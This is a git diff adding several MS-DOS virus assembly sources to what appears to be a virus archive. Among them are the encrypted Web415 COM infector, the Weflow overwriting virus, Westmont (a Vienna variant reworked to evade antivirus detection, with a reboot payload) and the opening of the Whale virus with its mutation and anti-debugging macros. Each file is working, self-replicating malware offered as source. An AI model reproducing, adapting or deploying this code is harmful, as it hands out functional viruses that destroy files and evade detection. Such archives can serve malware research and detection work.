+Crypt_Start equ $-Entry + + mov ah,1ah + mov dx,bp + add dx,Crypt_End + mov bx,dx + int 21h + + push es + push cs + pop es + mov di,100h + mov si,bp + add si,Old_BEGIN + mov cx,BEG_LEN + rep movsb + pop es + + cld + mov ah,4eh + mov cx, 20h + mov dx,bp + add dx,C_Mask +Interrupt: + int 21h + jb Not_Found + jmp Test_File +Not_Found: + mov ah,1ah + mov dx,80h + int 21h + jmp Exit_Proc +Test_File: + push bx + add bx,1ah + mov ax,[bx] + and ax,0f000h + cmp ax,0f000h + jnz Len_Tested +Find_Next: + pop bx + mov ah,4fh + jmp Short Interrupt +Len_Tested: + add bx,04h + xchg dx,bx + mov ax,3d02h + int 21h + xchg ax,bx + mov ah,3fh + mov cx,BEG_LEN + mov dx,bp + add dx,Old_BEGIN + push dx + int 21h + pop si + cmp byte ptr ds:[si+14h],'!' + je Close_File + jmp short Uses_File +Close_File: + mov ah,3eh + int 21h + jmp Find_Next + +Uses_File: + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + push ax + + cld + mov si,bp + xor di,di + mov cx, Crypt_End / 2 + rep movsw + + pusha + push es + pop ds + xor cx,cx + mov si, Crypt_Start +LBL_0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL_1 + jmp short LBL_0 +LBL_1: + popa + + mov ah,40h + mov cx,Crypt_End + xor dx,dx + int 21h + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + push cs + pop ds + pop ax + pop si + push si + mov di,bp + add ax,100h + add di,New1 + inc di + mov [di],ax + mov ah,40h + mov dx,bp + add dx,New_BEGIN + mov cx,BEG_LEN + int 21h + jmp Close_File + +C_MASK equ $-Entry +db '*.com',0h + +New_BEGIN equ $-Entry + push cs +LI: +New1 equ $-Entry + push offset Entry + retf +Apll equ $-Entry +Rems equ $-LI + db 'DrWeb - !' + +Old_BEGIN equ $-Entry + db 0c3h + db BEG_LEN-1 dup (90h) + +db 'RedArc // [TAVC]' + +Crypt_End equ $-Entry +Crypt_LEN equ $-LBL1 + +DTA db 80h dup (?) + +LBL equ $-Entry + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.web_415.asm b/MSDOS/Virus.MSDOS.Unknown.web_415.asm new file mode 100644 index 00000000..4900da20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.web_415.asm @@ -0,0 +1,232 @@ +;---------------------------------------------------------------------------- +; Web415 +; ⢮ Search +;---------------------------------------------------------------------------- +; (c) 1997 by I. Dikshew // [TAVC] // -=* Red Arc *=- +;---------------------------------------------------------------------------- + +Model Tiny +.Code +.286 +org 100h +start: + push cs + push offset Entry + retf + db 'DrWeb - !' +BEG_LEN equ $-start +Entry: + pusha + push ds + push es + call En1 +EN_LEN equ $-Entry +En1: + push ds + pop es + xchg ax,di + pop bp + sub bp,EN_LEN + mov bx,1100h + mov ah,4ah + int 21h + jnc ALLOCATED +Exit_Proc: + pop es + pop ds + popa + push cs + push si + retf +ALLOCATED: + mov ax,LBL + add ax,bp + mov cl,4 + shr ax,cl + inc ax + push ds + pop bx + add ax,bx + push ax + push cs + pop ds + pop es +LBL10: + mov si, bp + cld + xor cx,cx + add si, Crypt_Start +LBL0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL1 + jmp short LBL0 +LBL1: +Crypt_Start equ $-Entry + mov ah,1ah + mov dx,bp + add dx,Crypt_End + mov bx,dx + int 21h + push es + push cs + pop es + mov di,100h + mov si,bp + add si,Old_BEGIN + mov cx,BEG_LEN + rep movsb + pop es + mov byte ptr ds:[bp+Count],0 + cld + mov ah,4eh + mov cx, 20h + mov dx,bp + add dx,C_Mask +Interrupt: + int 21h + jb Not_Found + jmp Test_File +Not_Found: + mov ah,1ah + mov dx,80h + int 21h + jmp Exit_Proc +Test_File: + push bx + add bx,1ah + mov ax,[bx] + and ax,0f000h + cmp ax,0f000h + jnz Len_Tested +Find_Next: + pop bx + mov ah,4fh + jmp Short Interrupt +Len_Tested: + add bx,04h + xchg dx,bx + mov ax,3d02h + int 21h + xchg ax,bx + mov ah,3fh + mov cx,BEG_LEN + mov dx,bp + add dx,Old_BEGIN + push dx + int 21h + pop si + cmp byte ptr ds:[si+14h],'!' + je Close_File + jmp short Uses_File +Close_File: + mov ah,3eh + int 21h + mov al,byte ptr ds:[bp+Count] + cmp al,1 + jne Find_Next + pop bx + jmp Not_Found +Uses_File: + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + push ax + cld + mov si,bp + xor di,di + mov cx, Crypt_End / 2 + rep movsw + pusha + push es + pop ds + xor cx,cx + mov si, Crypt_Start +LBL_0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL_1 + jmp short LBL_0 +LBL_1: + popa + mov ah,40h + mov cx,Crypt_End + xor dx,dx + int 21h + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + push cs + pop ds + pop ax + pop si + push si + mov di,bp + add ax,100h + add di,New1 + inc di + mov [di],ax + mov ah,40h + mov dx,bp + add dx,New_BEGIN + mov cx,BEG_LEN + int 21h + mov byte ptr ds:[bp+Count],1 + jmp Close_File + +C_MASK equ $-Entry +db '*.com',0h + +New_BEGIN equ $-Entry + push cs +LI: +New1 equ $-Entry + push offset Entry + retf +Apll equ $-Entry +Rems equ $-LI + db 'DrWeb - !' + +Old_BEGIN equ $-Entry + db 0c3h + db BEG_LEN-1 dup (90h) + +Count equ $-Entry + db ? + +db 'RedArc // [TAVC]' + +Crypt_End equ $-Entry +Crypt_LEN equ $-LBL1 + +LBL equ $-Entry + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.weflow.asm b/MSDOS/Virus.MSDOS.Unknown.weflow.asm new file mode 100644 index 00000000..ff3adc9c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.weflow.asm @@ -0,0 +1,35 @@ +;| +;| WEFLOW 1993 VIRUS BY TESLA 5 +;| +;| THIS VIRUS IS BASED ON THE TRIDENT OVERWRITING VIRUS. SORRY FOR +;| LAMING AROUND, BUT IT KEEPS VARIANTS RISING. GREETINGS TO TRIDENT, +;| NUKE, PHALCON/SKISM AND YAM. YOU DON'T KNOW ME, BUT I DO... +;| + ORG 100H + +MAIN: MOV AH,4EH +NOTSOCOOL: LEA DX,FF + INT 21H + JNC COOL + RET + +COOL: MOV AX,3D02H + MOV DX,9EH + INT 21H + + XCHG AX,BX + MOV CL,VLEN + MOV AH,40H + INT 21H + + MOV AH,3EH + INT 21H + + MOV AH,4FH + JMP NOTSOCOOL + +FF DB '*.*',0 + + DB 'WEFLOW93' + +VLEN EQU $-MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.westmont.asm b/MSDOS/Virus.MSDOS.Unknown.westmont.asm new file mode 100644 index 00000000..5b831f19 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.westmont.asm @@ -0,0 +1,597 @@ +; Westmont: A vienna strain +; This is a variation on the Vienna virus which has had sections of its +; code moved around and rewritten in hopes that AV software will +; not be able to recognize it. The seconds flag used to make sure +; that a file isn't infected twice has been modified to 61. The +; check for DOS v1.x has been deleted. Thanks to 40Hex for the +; source to the original Vienna. What a novice (me) can do with +; well documented code! +;------------------------------------------------------------------------------ + +MOV_CX MACRO X + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +;***************************************************************************** +;Start out with a JMP around the remains of the original .COM file, into the +;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. +;The rest of the file (first 3 bytes) are stored in the virus data area. +;***************************************************************************** + +VCODE: JMP virbeg + +;This was the rest of the original .COM file. Tiny and simple, this time + + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + +;************************************************************ +; The actual virus starts here +;************************************************************ + +v_start equ $ + +virbeg: JMP codesrt ; Jump around signature + DB "Westmont",0 + DB "Ender" +codesrt: + CALL memtrick ; Call offset setting procedure + JMP find_path ; Start ifect routine + +;********************************************************************** +; Here when it's time to close it up & end +;********************************************************************** + +all_done: + PUSH DS + +;********************************************************************** +; Restore old DTA +;********************************************************************** + + MOV AH,1AH + MOV DX,[SI+old_dta] + MOV DS,[SI+old_dts] + INT 21H + + POP DS + +;************************************************************************* +; Clear registers used, & do a weird kind of JMP 100. The weirdness comes +; in since the address in a real JMP 100 is an offset, and the offset +; varies from one infected file to the next. By PUSHing an 0100H onto the +; stack, we can RET to address 0100H just as though we JMPed there. +;********************************************************************** + +quit: + POP CX + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + + RET 0FFFFH + + +; Infection routine +; ~~~~~~~~~~~~~~~~~ + +;************************************************************ +; Find the "PATH=" string in the environment +;************************************************************ + +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 + +;************************************************************ +; Loop to check for the next four characters +;************************************************************ + +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + LOOP check_next_4 ;Loop to check the next character + + POP SI + POP ES + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok + +;********************************************************** +; Look in the PATH for more subdirectories, if any +;********************************************************** + +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? + JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done + +;********************************************************** +; Here if there are more subdirectories in the path +;********************************************************** + +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace + +;*********************************************************** +; Move subdirectory name into file name workspace +;*********************************************************** + +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir + +;****************************************************************** +; Mark the fact that we're looking through the final subdirectory +;****************************************************************** + +moved_last_one: + MOV SI,0 + +;****************************************************************** +; Here after we've moved a subdirectory +;****************************************************************** + +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + +;****************************************************************** +; Make sure subdirectory ends in a "\" +;****************************************************************** + + CMP CH,'\' ;Ends with "\"? + JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB + +;****************************************************************** +; Here after we know there's a backslash at end of subdir +;****************************************************************** + +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + REPZ MOVSB ;Move "*.COM",0 to workspace + + MOV SI,BX + +;******************************************************************* +; Find first string matching *.COM +;******************************************************************* + + MOV AH,4EH + MOV DX,wrk_spc +; NOP ;MASM will add this NOP here + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + + JMP SHORT find_first + +;******************************************************************* +; Find next ASCIIZ string matching *.COM +;******************************************************************* + +find_next: + MOV AH,4FH + INT 21H + +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory + +;******************************************************************* +; Here when we find a file +;******************************************************************* + +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1FH ;62 seconds -> already infected + JZ find_next ;If so, go find another file + + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + JA find_next ;If too long, find another one + + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? + JB find_next ;Then go find another one + + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name + +;******************************************************************** +; Move the name to the end of the path +;******************************************************************** + +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + +;******************************************************************** +; Get File Attributes +;******************************************************************** + + POP SI + MOV AX,OFFSET 4300H + MOV DX,wrk_spc ;Point to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H + + MOV [SI+old_att],CX ;Save the old attributes + +;******************************************************************** +; Rewrite the attributes to allow writing to the file +;******************************************************************** + + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + MOV DX,wrk_spc ;Offset of \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + +;******************************************************************** +; Open Read/Write channel to the file +;******************************************************************** + + MOV AX,OFFSET 3D02H ;Read/Write + MOV DX,wrk_spc ;Offset to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +;******************************************************************* +; Get the file date & time +;******************************************************************* + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + +;******************************************************************* +; Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,7 ;Last 3 bits 0? (once in eight) + JNZ seven_in_eight + +;******************************************************************* +; The special "one in eight" infection. If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the .COM file, the +; file would get 5 bytes of code that reboot the system when the +; .COM file is run. +;******************************************************************* + + MOV AH,40H ;Write to file + MOV CX,5 ;Five bytes + MOV DX,SI + ADD DX,reboot ;Offset of reboot code in data area + INT 21H + + JMP SHORT fix_time_stamp + + NOP + +;****************************************************************** +; Here's where we infect a .COM file with this virus +;****************************************************************** + +seven_in_eight: + MOV AH,3FH + MOV CX,3 + MOV DX,first_3 +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + + JB fix_time_stamp ;Quit, if read failed + + CMP AX,3 ;Were we able to read all 3 bytes? + JNZ fix_time_stamp ;Quit, if not + +;****************************************************************** +; Move file pointer to end of file +;****************************************************************** + + MOV AX,OFFSET 4202H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Quit, if it didn't work + + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + +;******************************************************************* +; Write virus code to file +;******************************************************************* + + MOV AH,40H + + MOV_CX virlen ;Length of virus, in bytes + + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + + JB fix_time_stamp ;Jump if error + + CMP AX,OFFSET virlen ;All bytes written? + JNZ fix_time_stamp ;Jump if error + +;********************************************************************** +; Move file pointer to beginning of the file +;********************************************************************** + + MOV AX,OFFSET 4200H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Jump if error + +;********************************************************************** +; Write the 3 byte JMP at the start of the file +;********************************************************************** + + MOV AH,40H + MOV CX,3 + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + +;********************************************************************** +; Restore old file date & time, with seconds modified to 62 +;********************************************************************** + +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + OR CX,1FH ;Seconds = 31/30 min = 62 seconds + MOV AX,OFFSET 5701H + INT 21H + +;********************************************************************** +; Close File +;********************************************************************** + + MOV AH,3EH + INT 21H + +;********************************************************************** +; Restore Old File Attributes +;********************************************************************** + +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + MOV DX,wrk_spc +; NOP ;MASM will add this NOP + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + JMP all_done +; Offset setting procedure +; ~~~~~~~~~~~~~~~~~~~~~~~~ +memtrick: + PUSH CX + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. + CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + MOV CX,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + + PUSH ES + MOV AH,2FH + INT 21H + +;************************************************************* +; Save the DTA address +;************************************************************* + + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + + POP ES + +;************************************************************* +; Set DTA to point inside the virus data area +;************************************************************* + + MOV DX,dta ;Offset of new DTA in virus data area +; NOP ;MASM will add this NOP here + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment + RET + +;************************************************************************ +;The virus data starts here. It's accessed off the SI register, per the +; comments as shown +;************************************************************************ + +vir_dat EQU $ + + ;Use this with (SI + old_dta) +olddta_ DW 0 ;Old DTA offset + + ;Use this with (SI + old_dts) +olddts_ DW 0 ;Old DTA segment + + ;Use this with (SI + old_tim) +oldtim_ DW 0 ;Old Time + + ;Use this with (SI + ol_date) +oldate_ DW 0 ;Old date + + ;Use this with (SI + old_att) +oldatt_ DW 0 ;Old file attributes + +;Here's where the first three bytes of the original .COM file go.(SI + first_3) + +first3_ EQU $ + INT 20H + NOP + +;Here's where the new JMP instruction is worked out + + ;Use this with (SI + jmp_op) +jmpop_ DB 0E9H ;Start of JMP instruction + + ;Use this with (SI + jmp_dsp) +jmpdsp_ DW 0 ;The displacement part + +;This is the type of file we're looking to infect. (SI + f_spec) + +fspec_ DB '*.COM',0 + + ;Use this with (SI + path_ad) +pathad_ DW 0 ;Path address + + ;Use this with (SI + nam_ptr) +namptr_ DW 0 ;Pointer to start of file name + + ;Use this with (SI + env_str) +envstr_ DB 'PATH=' ;Find this in the environment + + ;File name workspace (SI + wrk_spc) +wrkspc_ DB 40h dup (0) + + ;Use this with (SI + dta) +dta_ DB 16h dup (0) ;Temporary DTA goes here + + ;Use this with (SI + dta_tim) +dtatim_ DW 0,0 ;Time stamp in DTA + + ;Use this with (SI + dta_len) +dtalen_ DW 0,0 ;File length in the DTA + + ;Use this with (SI + dta_nam) +dtanam_ DB 0Dh dup (0) ;File name in the DTA + + ;Use this with (SI + reboot) +reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 + +lst_byt EQU $ ;All lines that assemble into code are + ; above this one + +;***************************************************************************** +;The virus needs to know a few details about its own size and the size of its +; code portion. Let the assembler figure out these sizes automatically. +;***************************************************************************** + +virlen = lst_byt - v_start ;Length, in bytes, of the entire virus +codelen = vir_dat - v_start ;Length of virus code, only +c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code +c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP + +;***************************************************************************** +;Because this code is being appended to the end of an executable file, the +; exact address of its variables cannot be known. All are accessed as offsets +; from SI, which is represented as vir_dat in the below declarations. +;***************************************************************************** + +old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset +old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment +old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp +ol_date = oldate_ - vir_dat ;Displacement to old file date stamp +old_att = oldatt_ - vir_dat ;Displacement to old attributes +first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM +jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode +jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP +f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string +path_ad = pathad_ - vir_dat ;Displacement to the path address +nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer +env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string +wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace +dta = dta_ - vir_dat ;Displacement to the temporary DTA +dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA +dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA +dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA +reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code + + CODE ENDS +END VCODE + + diff --git a/MSDOS/Virus.MSDOS.Unknown.whale.asm b/MSDOS/Virus.MSDOS.Unknown.whale.asm new file mode 100644 index 00000000..8a41b71a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.whale.asm @@ -0,0 +1,5198 @@ +;===================================================================== +;===================================================================== +; The WHALE ; +; ; +; Listing erstellt 1991 , R. Hrner , Karlsruhe , FRGDR ; +; ; +;===================================================================== +;===================================================================== +code SEGMENT + ASSUME CS:code,DS:code,ES:CODE + .RADIX 16 + ORG 100h +;--------------------------------------------------------------------- +;----------------( Struktur der Entscheidungs-Tabelle fr INT 21h )--- +;--------------------------------------------------------------------- +IF_THEN STRUC +WENN DB ? +DANN DW ? + ENDS +;==========================================( Der Decoder-Aufruf )=== +MDECODE MACRO Adr + CALL DECODE + DW @L&adr-L&Adr +L&Adr: + ENDM +;==========================================( der Coder-Aufruf )=== +MCODE MACRO Adr + CALL CODEIT + DB @L&Adr-L&Adr+1 +@L&Adr: + ENDM +;--------------------------------------------------------------------- +;--------------------------------------------------( fr Mutanten )--- +L04BB5 EQU OFFSET D4BB5 +J00000 EQU L04BB5 - Offset Entry +J11111 EQU L04BB5 - Offset @INT21 +ZweiByte EQU J00000 / 2 +DreiByte EQU J00000 / 3 +M_Size EQU OFFSET J03AD0-OFFSET J03A84 +;--------------------------------------------------------------------- +;-------------------------------------------( "Mutierende" Makros )--- +;--------------------------------------------------------------------- +CALL_INT21 MACRO Adr,adr1 ; Selbst-Relozierend + + DB 0E8H + DW - (LL&ADR + J11111 + 1) +LL&ADR EQU $-OFFSET ADR1 + ENDM +;--------------------------------------------------------------------- +CALL_ENTRY MACRO Adr,adr1 ; Selbst-Relozierend + DB 0E8H + DW - (CE&ADR + J00000 ) +CE&ADR EQU $-OFFSET ADR1 + ENDM +;--------------------------------------------------------------------- +JMP_ENTRY MACRO Adr,adr1 ; Selbst-Relozierend + DB 0E9H + DW - (JM&ADR + J00000 ) +JM&ADR EQU $-OFFSET ADR1 + ENDM +;===================================================================== +;===============================================( zur relozierung )=== +;===================================================================== +FirstByte EQU OFFSET @FirstByte-OFFSET VirStart ; 20h +CODE_LEN EQU OFFSET LASTCODE-OFFSET @FirstByte ; 2385H +CODE_START EQU OFFSET J04BCF - OFFSET @FirstByte ; 239FH +;===================================================================== +;============================================( vernderlicher Code)=== +;===================================================================== +SwapCode_1 EQU Offset Decode - Offset VirStart ; 0A33h +Swapcode_2 EQU OFFSET J03A20 - Offset VirStart ; 1210h +Swapcode_3 EQU OFFSET J0491A - Offset J03047 ; 18D3h +SwapCode_4 EQU OFFSET J03047 - Offset VirStart ; 0837H +SwapCode_5 EQU OFFSET J03259 - Offset VirStart ; 0A49h +SwapCode_6 EQU OFFSET J02CFF - Offset VirStart ; 04EFh +SwapCode_7 EQU Offset SwitchByte-Offset VirStart; +SwapCode_8 EQU Offset Int_02 - Offset VirStart ; 3181h +;===================================================================== +;========================================( einfacher zu schreiben )=== +;===================================================================== +XorByte__1 EQU OFFSET D_4A5E - Offset VirStart ; 224Eh +XorByte__2 EQU OFFSET D_4A79 - Offset VirStart ; 2269h +;===================================================================== +Part_____1 EQU OFFSET D4BAC - OFFSET VirStart ; 239Ch +Len_Part_1 EQU OFFSET Lastbyte - Offset D4BAC ; 0054h +;===================================================================== +SchwimmZiel EQU OFFSET J029C1 - Offset VirStart ; 01B1h +WischeWeg EQU OFFSET D4B7C - Offset VirStart ; 236Ch +;===================================================================== +SS_INIT EQU Offset EXE_SS_INIT-Offset VirStart +SP_INIT EQU Offset EXE_SP_INIT-Offset VirStart +CODE_INIT EQU Offset EXE_CODE_INIT-Offset VirStart +;===================================================================== +;=============================( Sprungtabelle fr Int 21h-Handler )=== +;===================================================================== +L0699 EQU Offset J02ea9 - Offset VirStart +L04f4 EQU Offset J02D04 - Offset VirStart +L06E0 EQU Offset J02EF0 - Offset VirStart +L06CA EQU Offset J02EDA - Offset VirStart +L08CF EQU Offset J030DF - Offset VirStart +L06C8 EQU Offset J02ED8 - Offset VirStart +L0996 EQU Offset J031A6 - Offset VirStart +L09E4 EQU Offset J031F4 - Offset VirStart +L1E5E EQU Offset J0466E - Offset VirStart +L1DA2 EQU Offset J045B2 - Offset VirStart +L0AD4 EQU Offset J0325D - Offset VirStart +L1F70 EQU Offset J04780 - Offset VirStart +L1D0F EQU Offset J0451F - Offset VirStart +;===================================================================== +;==============================( wenn ein Debugger erkannt wird...)=== +;===================================================================== +IfDebugWal EQU (Offset J04B6A-Offset CreateTempCode+1) / 2 +StartDebug EQU Offset CreateTempCode-Offset VirStart +;===================================================================== +;==========================================( Erklrung fehlt noch )=== +;===================================================================== +@0478 EQU 0478H +@FB88 EQU 10000h-@0478 +;===================================================================== +;=================================================( COM-Einsprung )=== +;===================================================================== +start: JMP ENTRY ; JMP Decode_Whale + DB 00h +Whale_ID DW 020CCh ; kennung, da File infiziert +;===================================================================== + DB 2300h-6 DUP (0) +;--------------------------------------------------------------------- +; +; DIESE DATEN WERDEN ZWAR **VOR** DEN CODE +; ASSEMBLIERT, ABER ***HINTER*** DEM CODE ABGELEGT !! +; +; DAS IST DER ***EINZIGE GRUND*** WARUM DIE VIELEN +; NULL-BYTES VOR DEM WAL STEHEN !!! +; +; DER CODE IST Code_len BYTE LANG. +; +; AB OFFSET Code_len DRFEN ALSO DATEN STEHEN. +; DESHALB GIBT ES AUCH KEINE DATEN, DIE ***VOR*** DIESEM +; OFFSET ABGELEGT WERDEN ! +;==================================================================== +;===========================================( Speichereinteilung )=== +;==================================================================== +; Assemblierungszeit : Zur Laufzeit (resident): +; +; +-CS:0100=DS:0100-+ +--CS:0000-DS:2810-+ <- Segment 9D90h +; | | | Code | +; | Leer | | | +; | | | | +; +-CS:2400=DS:2400-+ +--CS:2400-DS:4C10-+ (DS:4C43=CS:2433!) +; | Daten | | DATEN | +; +-CS:2700=DS:2700-+ +--CS:2700-DS:4F10-+ <--Speicherbedarf +; | Leer | | Grafikkarte | incl. Zugriff auf +; +-CS:2800=DS:2800-+ | | residenten +; | Save-Daten+Code | | | COMMAND.COM +; +-CS:2810=DS:2810-+ | | +; | | | | +; | Code | | | +; | | | | +; +-CS:4c00=DS:4C00-+ +------------------+ +; +;--------------------------------------------------------------------- +OFFSET_2400: +CodBuf DB 1Ch DUP (?) ; Wirts-File-Beginn / Puffer +;--------------------------------------------------------------------- +D241C DB ? +D241D DB ? +D241E DW ? +D2420 DW ? +D2422 DW ? +D2424 DD ? ; Adresse des exec-param-blocks +D2428 DB ? ; Drive des aktuellen Files +FileTime DW ? ; File-Uhrzeit +FileDate DW ? ; File-Datum +Trace_Adres DD ? ; Temp-DD fr Trace-Adresse +D2431 DW ? +D2433 DB ? ; "1" : Nach Verschluesselung INT 21h + ; ausfhren und wieder Entschluesseln. +D2434 DB ? +Low_INT_21H DD ? ; IBMDOS-Adresse INT 21h +@Int_13h DD ? ; Adresse INT 13h +D243D DD ? ; Adresse INT 24H +PSP_SEG DW ? ; PSP-SEGMENT +D2443 DW ? +D2445 DW ? +D2447 DW ? ; Erster MCB / Tracesegment +D2449 DW ? +;--------------------------------------------------------------------- +;--------------------------------------------( wird "JMP CS:2256" )--- +;--------------------------------------------( also "JMP VirInt21")--- +D244B DB ? +D244C DW ? +D244E DW ? +;--------------------------------------------------------------------- +D2450 DW ? ; Trace-Kontrollwort +D2452 DW 14h DUP (?) +D247A DW 14h DUP (?) +D24A2 DB ? ; +@PSP DW ? ; Aktuelles PSP-Segment +FilePos DD ? ; File-Pos +FileSize DD ? ; File-Size +D24AD DW ? ; Offset des Caller-Lese-Puffers +D24AF DW ? ; Anzahl der zu lesenden Byte +D24B1 DW ? +D24B3 DW ? ; CALLERS - Flags ! +D24B5: +@FCB DB 25h DUP (?) ; FCB +Error DB ? ; ERROR aufgetreten ; 24DA +D24DB DW ? +D24DD DW ? ; PLatz fr SS +D24DF DW ? ; Platz fr SP +D24E1 DW ? +D24E3 DW ? ; Platz fr AX +D24E4 DW ? +;--------------------------------------------------------------------- 